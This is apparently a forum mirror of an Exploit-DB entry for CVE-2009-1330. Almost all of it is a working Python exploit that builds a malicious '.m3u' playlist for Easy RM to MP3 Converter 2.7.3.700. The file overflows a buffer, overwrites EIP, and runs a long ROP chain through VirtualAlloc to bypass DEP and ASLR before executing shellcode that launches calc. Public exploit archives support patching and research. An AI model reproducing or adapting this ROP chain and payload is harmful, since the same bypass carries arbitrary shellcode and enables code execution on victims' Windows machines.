- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39933
- Проверка EDB
-
- Пройдено
- Автор
- FITZL CSABA
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2009-1330
- Дата публикации
- 2016-06-13
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
Код:
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # RETN
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
# AT this point EAX = 0x1000
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
0x41414141, # Filler (compensate)
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
0xffffffff, #
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
rop = create_rop_chain()
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90"*0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()
- Источник
- www.exploit-db.com